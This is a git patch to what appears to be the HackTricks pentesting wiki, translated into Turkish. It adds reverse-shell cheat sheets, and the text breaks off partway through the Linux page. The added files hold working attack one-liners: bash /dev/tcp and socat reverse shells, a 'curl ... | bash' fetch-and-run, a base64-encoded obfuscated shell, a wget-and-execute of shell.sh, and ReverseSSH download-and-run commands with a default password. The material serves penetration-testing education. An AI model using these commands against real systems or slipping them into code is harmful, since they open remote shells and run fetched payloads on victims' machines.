From b0cd389b3865cf6a152d37a3c21ec6f3e7132d32 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 31 Aug 2024 16:27:31 +0000 Subject: [PATCH] Translated ['generic-methodologies-and-resources/pentesting-methodology. --- SUMMARY.md | 10 +- .../pentesting-methodology.md | 70 +-- .../reverse-shells/README.md | 36 ++ .../reverse-shells/full-ttys.md | 134 +++++ .../reverse-shells/linux.md | 362 +++++++++++++ .../reverse-shells/msfvenom.md | 240 +++++++++ .../reverse-shells/windows.md | 506 ++++++++++++++++++ .../pentesting-web/rocket-chat.md | 16 +- 8 files changed, 1325 insertions(+), 49 deletions(-) create mode 100644 generic-methodologies-and-resources/reverse-shells/README.md create mode 100644 generic-methodologies-and-resources/reverse-shells/full-ttys.md create mode 100644 generic-methodologies-and-resources/reverse-shells/linux.md create mode 100644 generic-methodologies-and-resources/reverse-shells/msfvenom.md create mode 100644 generic-methodologies-and-resources/reverse-shells/windows.md diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index bff14b761..c5fd3e962 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,15 +1,15 @@ -# Pentesting Methodology +# Pentesting Metodolojisi {% hint style="success" %} -AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
@@ -21,7 +21,7 @@ Eğer **hacking kariyeri** ile ilgileniyorsanız ve hacklenemez olanı hacklemek {% embed url="https://www.stmcyber.com/careers" %} -## Pentesting Methodology +## Pentesting Metodolojisi
@@ -31,7 +31,7 @@ _Hacktricks logoları_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_ Saldırmak istediğiniz makineye **fiziksel erişiminiz** var mı? **Fiziksel saldırılar hakkında bazı ipuçlarını** [**okumalısınız**](../hardware-physical-access/physical-attacks.md) ve [**GUI uygulamalarından kaçış hakkında**](../hardware-physical-access/escaping-from-gui-applications.md) diğerlerini incelemelisiniz. -### 1 - [Ağ içindeki hostları keşfetme](pentesting-network/#discovering-hosts)/ [Şirketin varlıklarını keşfetme](external-recon-methodology/) +### 1 - [Ağ içindeki hostları keşfetme](pentesting-network/#discovering-hosts)/ [Şirketin Varlıklarını Keşfetme](external-recon-methodology/) **Yaptığınız** **testin** **içsel veya dışsal test** olup olmadığına bağlı olarak, **şirket ağı içindeki hostları bulmak** (içsel test) veya **şirketin internetteki varlıklarını bulmak** (dışsal test) isteyebilirsiniz. @@ -39,10 +39,10 @@ Saldırmak istediğiniz makineye **fiziksel erişiminiz** var mı? **Fiziksel sa Dışsal bir test yapıyorsanız, şirketin iç ağına erişim sağladıktan sonra bu kılavuzu yeniden başlatmalısınız. {% endhint %} -### **2-** [**Ağ ile Eğlenmek**](pentesting-network/) **(İçsel)** +### **2-** [**Ağ ile Eğlenme**](pentesting-network/) **(İçsel)** **Bu bölüm yalnızca içsel bir test yapıyorsanız geçerlidir.**\ -Bir hosta saldırmadan önce, belki de **ağdan bazı kimlik bilgilerini çalmayı** veya **veri dinlemeyi** tercih edersiniz, böylece ağ içinde **pasif/aktif (MitM)** olarak neler bulabileceğinizi öğrenirsiniz. [**Pentesting Network**](pentesting-network/#sniffing) bölümünü okuyabilirsiniz. +Bir hosta saldırmadan önce, belki de **ağdan bazı kimlik bilgilerini çalmayı** veya **veri dinlemeyi** tercih edersiniz, böylece ağ içinde **pasif/aktif (MitM)** olarak neler bulabileceğinizi öğrenirsiniz. [**Pentesting Ağı**](pentesting-network/#sniffing) okuyabilirsiniz. ### 3- [Port Taraması - Servis keşfi](pentesting-network/#scanning-hosts) @@ -58,32 +58,32 @@ Eğer çalışan herhangi bir servis için şık bir exploit yoksa, her çalış **Bu kitapta en yaygın servisleri pentest etmek için bir kılavuz bulacaksınız** (ve o kadar yaygın olmayan diğerlerini de). Lütfen, sol dizinde **_**PENTESTING**_ **bölümünü arayın** (servisler varsayılan portlarına göre sıralanmıştır). -**Özellikle** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **bölümüne özel bir vurgu yapmak istiyorum (çünkü en kapsamlı olanıdır).**\ -Ayrıca, [**yazılımlardaki bilinen zafiyetleri bulma**](search-exploits.md) hakkında küçük bir kılavuz burada bulunmaktadır. +**Özellikle** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **bölümüne özel bir vurgu yapmak istiyorum (en kapsamlı olanıdır).**\ +Ayrıca, [**yazılımlardaki bilinen zafiyetleri bulma**](search-exploits.md) hakkında küçük bir kılavuz burada bulunabilir. -**Eğer servisinizi dizinde bulamıyorsanız, Google'da** diğer eğitimleri arayın ve **eklememi istiyorsanız bana bildirin.** Eğer Google'da **hiçbir şey bulamazsanız**, kendi **kör pentesting** işleminizi gerçekleştirin, **servise bağlanarak, fuzzing yaparak ve yanıtları okuyarak** başlayabilirsiniz (varsa). +**Eğer servisinizi dizinde bulamıyorsanız, Google'da** diğer eğitimleri arayın ve **eklememi istiyorsanız bana bildirin.** Eğer Google'da **hiçbir şey bulamazsanız**, kendi **kör pentesting'inizi** gerçekleştirin, **servise bağlanarak, fuzzing yaparak ve yanıtları okuyarak** başlayabilirsiniz (varsa). #### 5.1 Otomatik Araçlar -Ayrıca **otomatik zafiyet değerlendirmeleri** gerçekleştirebilen birkaç araç da vardır. **[**Legion**](https://github.com/carlospolop/legion)**'u denemenizi öneririm, bu benim oluşturduğum ve bu kitapta bulabileceğiniz pentesting servisleri hakkında notlara dayanan bir araçtır.** +Ayrıca **otomatik zafiyet değerlendirmeleri** yapabilen birkaç araç da vardır. **[**Legion**](https://github.com/carlospolop/legion)**'u denemenizi öneririm, bu benim oluşturduğum ve bu kitapta bulabileceğiniz pentesting servisleri hakkında notlara dayanan bir araçtır.** -#### **5.2 Brute-Force ile servisleri kırma** +#### **5.2 Brute-Force ile hizmetleri kırma** -Bazı senaryolarda **Brute-Force** bir **servisi** **tehdit etmek** için yararlı olabilir. [**Farklı servislerin brute forcing için bir CheatSheet'ini buradan bulabilirsiniz**](brute-force.md)**.** +Bazı senaryolarda **Brute-Force** bir **servisi** **tehdit etmek** için yararlı olabilir. [**Farklı servislerin brute forcing'i için burada bir CheatSheet bulabilirsiniz**](brute-force.md)**.** ### 6- [Phishing](phishing-methodology/) -Eğer bu noktada ilginç bir zafiyet bulamadıysanız, ağa girmek için **bazı phishing denemeleri yapmanız** gerekebilir. Phishing metodolojimi [buradan](phishing-methodology/) okuyabilirsiniz: +Bu noktada ilginç bir zafiyet bulamadıysanız, **ağa girmek için bazı phishing denemeleri yapmanız** gerekebilir. Phishing metodolojimi [buradan](phishing-methodology/) okuyabilirsiniz: -### **7-** [**Shell Elde Etme**](shells/) +### **7-** [**Shell Alma**](reverse-shells/) -Bir şekilde, kurban üzerinde **kod çalıştırmanın** bir yolunu bulmuş olmalısınız. O zaman, [**ters shell almak için sistem içindeki olası araçların bir listesinin çok faydalı olacağını**](shells/) göreceksiniz. +Bir şekilde, kurban üzerinde **kod çalıştırmanın** bir yolunu bulmuş olmalısınız. O zaman, [sistem içinde bir ters shell almak için kullanabileceğiniz olası araçların bir listesini bulmak çok faydalı olacaktır](reverse-shells/). Özellikle Windows'ta **antivirüslerden kaçınmak için** bazı yardımlara ihtiyacınız olabilir: [**Bu sayfayı kontrol edin**](../windows-hardening/av-bypass.md)**.**\\ ### 8- İçeride -Shell ile sorun yaşıyorsanız, pentesterlar için en kullanışlı komutların küçük bir **derlemesini** burada bulabilirsiniz: +Shell ile ilgili sorunlar yaşıyorsanız, pentesterlar için en kullanışlı komutların küçük bir **derlemesini** burada bulabilirsiniz: * [**Linux**](../linux-hardening/useful-linux-commands.md) * [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) @@ -91,14 +91,14 @@ Shell ile sorun yaşıyorsanız, pentesterlar için en kullanışlı komutların ### **9 -** [**Veri Sızdırma**](exfiltration.md) -Muhtemelen **kurbandan bazı verileri çıkarmanız** veya hatta **bir şeyler eklemeniz** gerekecek (örneğin, ayrıcalık yükseltme betikleri). **Burada bu amaçlarla kullanabileceğiniz** [**yaygın araçlar hakkında bir yazı bulabilirsiniz**](exfiltration.md)**.** +Muhtemelen **kurbandan bazı verileri çıkarmanız** veya hatta **bir şeyler eklemeniz** (örneğin ayrıcalık yükseltme betikleri) gerekecektir. **Burada bu amaçlarla kullanabileceğiniz** [**yaygın araçlar hakkında bir yazı bulabilirsiniz**](exfiltration.md)**.** ### **10- Ayrıcalık Yükseltme** #### **10.1- Yerel Privesc** Eğer kutu içinde **root/Administrator** değilseniz, **ayrıcalıkları yükseltmenin** bir yolunu bulmalısınız.\ -Burada **yerel olarak ayrıcalıkları yükseltmek için bir kılavuz bulabilirsiniz** [**Linux**](../linux-hardening/privilege-escalation/) **ve** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ +Burada **Linux'ta yerel ayrıcalıkları yükseltmek için bir kılavuz** [**bulabilirsiniz**](../linux-hardening/privilege-escalation/) **ve** [**Windows'ta**](../windows-hardening/windows-local-privilege-escalation/)**.**\ Ayrıca **Windows'un nasıl çalıştığına dair** bu sayfaları kontrol etmelisiniz: * [**Kimlik Doğrulama, Kimlik Bilgileri, Token ayrıcalıkları ve UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) @@ -110,37 +110,37 @@ Ayrıca **Windows'un nasıl çalıştığına dair** bu sayfaları kontrol etmel #### **10.2- Alan Privesc** -Burada [**Active Directory'de ayrıcalıkları listelemek, yükseltmek ve kalıcı hale getirmek için en yaygın eylemleri açıklayan bir metodoloji bulabilirsiniz**](../windows-hardening/active-directory-methodology/). Bu sadece bir bölümün alt bölümü olsa da, bu süreç **Pentesting/Red Team görevinde son derece hassas** olabilir. +Burada [**Active Directory'de ayrıcalıkları listelemek, yükseltmek ve kalıcı hale getirmek için en yaygın eylemleri açıklayan bir metodoloji bulabilirsiniz**](../windows-hardening/active-directory-methodology/). Bu sadece bir bölümün alt bölümü olsa da, bu süreç **Pentesting/Kırmızı Takım** görevinde **son derece hassas** olabilir. ### 11 - POST #### **11**.1 - Yağmalama -Host içinde daha fazla **şifre** bulup bulamayacağınızı veya **kullanıcınızın ayrıcalıklarıyla** **diğer makinelere erişiminiz olup olmadığını** kontrol edin.\ +Host içinde daha fazla **şifre** bulup bulamayacağınızı veya **kullanıcınızın ayrıcalıklarıyla diğer makinelere erişiminiz olup olmadığını** kontrol edin.\ Burada [**Windows'ta şifreleri dökme**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) için farklı yollar bulabilirsiniz. #### 11.2 - Kalıcılık **Sistemi tekrar istismar etmenize gerek kalmaması için 2 veya 3 farklı kalıcılık mekanizması kullanın.**\ -**Burada bazı** [**active directory'de kalıcılık ipuçları**](../windows-hardening/active-directory-methodology/#persistence)** bulabilirsiniz.** +**Burada bazı** [**Active Directory'de kalıcılık ipuçları**](../windows-hardening/active-directory-methodology/#persistence)** bulabilirsiniz.** -TODO: Windows & Linux'ta kalıcılık Postunu tamamla +TODO: Windows & Linux'ta kalıcılık Post'unu tamamla -### 12 - Pivoting +### 12 - Pivotlama -**Toplanan kimlik bilgileriyle** diğer makinelere erişiminiz olabilir veya belki de **yeni hostları keşfetmeniz ve taramanız** (Pentesting Metodolojisini yeniden başlatın) gerekebilir, kurbanınızın bağlı olduğu yeni ağlar içinde.\ -Bu durumda tünelleme gerekli olabilir. [**Tünelleme hakkında bir yazı bulabilirsiniz**](tunneling-and-port-forwarding.md).\ -Ayrıca [Active Directory pentesting Metodolojisi](../windows-hardening/active-directory-methodology/) hakkında yazıyı kontrol etmelisiniz. Orada yanlamasına hareket etme, ayrıcalıkları yükseltme ve kimlik bilgilerini dökme konusunda harika ipuçları bulacaksınız.\ -Ayrıca [**NTLM**](../windows-hardening/ntlm/) sayfasını kontrol edin, Windows ortamlarında pivot yapmak için çok faydalı olabilir. +**Toplanan kimlik bilgileriyle** diğer makinelere erişiminiz olabilir veya belki de **yeni hostları keşfetmek ve taramak** (Pentesting Metodolojisini yeniden başlatmak) gerekebilir.\ +Bu durumda tünelleme gerekli olabilir. Burada [**tünelleme hakkında bir yazı bulabilirsiniz**](tunneling-and-port-forwarding.md).\ +Kesinlikle [Active Directory pentesting Metodolojisi](../windows-hardening/active-directory-methodology/) hakkında yazıyı da kontrol etmelisiniz. Orada yanlamasına hareket etme, ayrıcalıkları yükseltme ve kimlik bilgilerini dökme konusunda harika ipuçları bulacaksınız.\ +Ayrıca [**NTLM**](../windows-hardening/ntlm/) sayfasını kontrol edin, Windows ortamlarında pivotlama için çok faydalı olabilir. ### DAHA FAZLA #### [Android Uygulamaları](../mobile-pentesting/android-app-pentesting/) -#### **Sömürü** +#### **Sömürme** -* [**Temel Linux Sömürüsü**](broken-reference) -* [**Temel Windows Sömürüsü**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) +* [**Temel Linux Sömürme**](broken-reference/) +* [**Temel Windows Sömürme**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Temel sömürü araçları**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) #### [**Temel Python**](python/) @@ -158,15 +158,15 @@ Eğer **hacking kariyeri** ile ilgileniyorsanız ve hacklenemez olanı hacklemek {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
diff --git a/generic-methodologies-and-resources/reverse-shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md new file mode 100644 index 000000000..2ee2a9bc2 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/README.md @@ -0,0 +1,36 @@ +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} + + +# [**Shells - Linux**](linux.md) + +# [**Shells - Windows**](windows.md) + +# [**MSFVenom - CheatSheet**](msfvenom.md) + +# [**Full TTYs**](full-ttys.md) + +# **Otomatik oluşturulan shell'ler** + +* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) +* [**https://www.revshells.com/**](https://www.revshells.com/) +* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator) +* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop) +* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse) +* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/) +* [**https://github.com/xct/xc/**](https://github.com/xct/xc/) +* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/) +* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen) +* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) diff --git a/generic-methodologies-and-resources/reverse-shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md new file mode 100644 index 000000000..0ec1c3aa8 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/full-ttys.md @@ -0,0 +1,134 @@ +# Full TTYs + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} + +## Full TTY + +`SHELL` değişkeninde ayarladığınız shell'in **mutlaka** _**/etc/shells**_ içinde **listelenmiş olması gerektiğini** unutmayın veya `SHELL değişkeni için değer /etc/shells dosyasında bulunamadı. Bu olay rapor edildi` mesajını alırsınız. Ayrıca, sonraki kod parçalarının yalnızca bash'te çalıştığını unutmayın. Eğer zsh'deyseniz, shell'i elde etmeden önce `bash` komutunu çalıştırarak bash'e geçin. + +#### Python + +{% code overflow="wrap" %} +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' + +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +{% hint style="info" %} +**`stty -a`** komutunu çalıştırarak **satır** ve **sütun** **sayısını** alabilirsiniz. +{% endhint %} + +#### script + +{% code overflow="wrap" %} +```bash +script /dev/null -qc /bin/bash #/dev/null is to not store anything +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +#### socat +```bash +#Listener: +socat file:`tty`,raw,echo=0 tcp-listen:4444 + +#Victim: +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 +``` +### **Shell'leri Başlatma** + +* `python -c 'import pty; pty.spawn("/bin/sh")'` +* `echo os.system('/bin/bash')` +* `/bin/sh -i` +* `script -qc /bin/bash /dev/null` +* `perl -e 'exec "/bin/sh";'` +* perl: `exec "/bin/sh";` +* ruby: `exec "/bin/sh"` +* lua: `os.execute('/bin/sh')` +* IRB: `exec "/bin/sh"` +* vi: `:!bash` +* vi: `:set shell=/bin/bash:shell` +* nmap: `!sh` + +## ReverseSSH + +**Etkileşimli shell erişimi**, **dosya transferleri** ve **port yönlendirmesi** için uygun bir yol, statik bağlantılı ssh sunucusu [ReverseSSH](https://github.com/Fahrj/reverse-ssh)'yi hedefe bırakmaktır. + +Aşağıda `x86` için upx sıkıştırılmış ikili dosyalarla bir örnek bulunmaktadır. Diğer ikili dosyalar için [sürümler sayfasını](https://github.com/Fahrj/reverse-ssh/releases/latest/) kontrol edin. + +1. ssh port yönlendirme isteğini yakalamak için yerel olarak hazırlanın: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -v -l -p 4444 +``` +{% endcode %} + +* (2a) Linux hedef: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* (2b) Windows 10 hedefi (daha eski sürümler için [proje readme](https://github.com/Fahrj/reverse-ssh#features) kontrol edin): + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe + +reverse-ssh.exe -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* Eğer ReverseSSH port yönlendirme isteği başarılı olduysa, `reverse-ssh(.exe)`'yi çalıştıran kullanıcının bağlamında varsayılan şifre `letmeinbrudipls` ile giriş yapabilmelisiniz: +```bash +# Interactive shell access +ssh -p 8888 127.0.0.1 + +# Bidirectional file transfer +sftp -P 8888 127.0.0.1 +``` +## No TTY + +Eğer bir sebepten dolayı tam bir TTY elde edemiyorsanız, **yine de kullanıcı girişi bekleyen programlarla etkileşimde bulunabilirsiniz**. Aşağıdaki örnekte, şifre `sudo`'ya bir dosyayı okumak için iletiliyor: +```bash +expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' +``` +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md new file mode 100644 index 000000000..9f9d18b6d --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -0,0 +1,362 @@ +# Shells - Linux + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +**Bu shell'ler hakkında sorularınız varsa** [**https://explainshell.com/**](https://explainshell.com) **ile kontrol edebilirsiniz.** + +## Full TTY + +**Bir ters shell aldığınızda**[ **tam bir TTY elde etmek için bu sayfayı okuyun**](full-ttys.md)**.** + +## Bash | sh +```bash +curl https://reverse-shell.sh/1.1.1.1:3000 | bash +bash -i >& /dev/tcp// 0>&1 +bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done + +#Short and bypass (credits to Dikline) +(sh)0>/dev/tcp/10.10.10.10/9091 +#after getting the previous shell to get the output to execute +exec >&0 +``` +Diğer shell'leri kontrol etmeyi unutmayın: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh ve bash. + +### Sembol güvenli shell +```bash +#If you need a more stable connection do: +bash -c 'bash -i >& /dev/tcp// 0>&1' + +#Stealthier method +#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 +echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null +``` +#### Shell açıklaması + +1. **`bash -i`**: Bu komutun bu kısmı etkileşimli (`-i`) bir Bash shell başlatır. +2. **`>&`**: Bu komutun bu kısmı **standart çıktıyı** (`stdout`) ve **standart hatayı** (`stderr`) **aynı hedefe yönlendirmek için** kısayol notasyonudur. +3. **`/dev/tcp//`**: Bu, **belirtilen IP adresine ve porta bir TCP bağlantısını temsil eden** özel bir dosyadır. +* **Çıktı ve hata akışlarını bu dosyaya yönlendirerek**, komut etkili bir şekilde etkileşimli shell oturumunun çıktısını saldırganın makinesine gönderir. +4. **`0>&1`**: Bu komutun bu kısmı **standart girişi (`stdin`) standart çıktının (`stdout`) aynı hedefine yönlendirir**. + +### Dosya oluştur ve çalıştır +```bash +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; +wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh +``` +## Forward Shell + +Bir **Remote Code Execution (RCE)** zafiyeti ile bir Linux tabanlı web uygulamasıyla uğraşırken, ters bir shell elde etmek, iptables kuralları veya karmaşık paket filtreleme mekanizmaları gibi ağ savunmaları tarafından engellenebilir. Böyle kısıtlı ortamlarda, ele geçirilmiş sistemle daha etkili bir şekilde etkileşim kurmak için bir PTY (Pseudo Terminal) shell oluşturmak alternatif bir yaklaşım olarak öne çıkmaktadır. + +Bu amaç için önerilen bir araç [toboggan](https://github.com/n3rada/toboggan.git) olup, hedef ortamla etkileşimi basitleştirir. + +Toboggan'ı etkili bir şekilde kullanmak için, hedef sisteminizin RCE bağlamına uygun bir Python modülü oluşturun. Örneğin, `nix.py` adında bir modül aşağıdaki gibi yapılandırılabilir: +```python3 +import jwt 